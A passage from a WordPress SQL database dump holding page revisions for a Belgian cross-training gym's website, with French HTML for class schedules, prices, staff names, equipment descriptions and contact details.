(212, 1, '2013-07-03 18:22:23', '2013-07-03 18:22:23', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<p></p>\r\n<p></p>\r\n<p></p>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<p></p>\r\n<p></p>\r\n<p></p>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<p></p>\r\n<p></p>\r\n<p></p>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:22:23', '2013-07-03 18:22:23', '', 11, 'http://www.crosstrainingcenter.be/?p=212', 0, 'revision', '', 0),
(218, 2, '2013-09-17 20:26:02', '2013-09-17 20:26:02', '<h2>Prix</h2>\n<table>\n<tbody>\n<tr>\n<td class=\"ttitrehprix\">Team Training (réservation obligatoire)</td>\n<td class=\"tcelluleprix\">1 séance : 9.00€\n1 carte de 10 séances : 80.00€ (valable 3 mois)\n1 carte de 20 séances : 120.00€ (valable 4 mois)\nAbonnement 6 mois illimité : 399.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\nSuivi 15,00€</td>\n</tr>\n</tbody>\n</table>', 'Prix', '', 'inherit', 'open', 'open', '', '214-autosave', '', '', '2013-09-17 20:26:02', '2013-09-17 20:26:02', '', 214, 'http://www.crosstrainingcenter.be/?p=218', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(214, 1, '2013-07-03 18:25:11', '2013-07-03 18:25:11', '<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training (réservation obligatoire)</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Prix', '', 'publish', 'closed', 'open', '', 'prix', '', '', '2013-11-04 17:38:55', '2013-11-04 17:38:55', '', 0, 'http://www.crosstrainingcenter.be/?page_id=214', 0, 'page', '', 0),
(215, 1, '2013-07-03 18:25:05', '2013-07-03 18:25:05', '', 'Prix', '', 'inherit', 'open', 'open', '', '214-revision', '', '', '2013-07-03 18:25:05', '2013-07-03 18:25:05', '', 214, 'http://www.crosstrainingcenter.be/?p=215', 0, 'revision', '', 0),
(232, 1, '2013-07-03 19:31:30', '2013-07-03 19:31:30', '', 'bertrand_bauwin-pti', '', 'inherit', 'open', 'open', '', 'bertrand_bauwin-pti', '', '', '2013-07-03 19:31:30', '2013-07-03 19:31:30', '', 20, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg', 0, 'attachment', 'image/jpeg', 0),
(217, 1, '2013-07-03 18:23:56', '2013-07-03 18:23:56', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:23:56', '2013-07-03 18:23:56', '', 11, 'http://www.crosstrainingcenter.be/?p=217', 0, 'revision', '', 0),
(220, 1, '2013-06-16 15:15:32', '2013-06-16 15:15:32', '<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nChaussée de Perwez 251\r\n5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a>\r\n<h1>Plan d\'accès :</h1>\r\n&nbsp;\r\n<iframe width=\"425\" height=\"350\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;source=embed\" style=\"color:#0000FF;text-align:left\">Agrandir le plan</a></small>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-06-16 15:15:32', '2013-06-16 15:15:32', '', 9, 'http://www.crosstrainingcenter.be/?p=220', 0, 'revision', '', 0),
(221, 1, '2013-06-16 15:08:36', '2013-06-16 15:08:36', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 15:08:36', '2013-06-16 15:08:36', '', 20, 'http://www.crosstrainingcenter.be/?p=221', 0, 'revision', '', 0),
(222, 1, '2013-06-16 13:47:21', '2013-06-16 13:47:21', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\"><img class=\"alignnone size-full wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\"><img class=\"alignnone size-full wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 13:47:21', '2013-06-16 13:47:21', '', 22, 'http://www.crosstrainingcenter.be/?p=222', 0, 'revision', '', 0),
(223, 1, '2013-07-03 19:02:56', '2013-07-03 19:02:56', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td 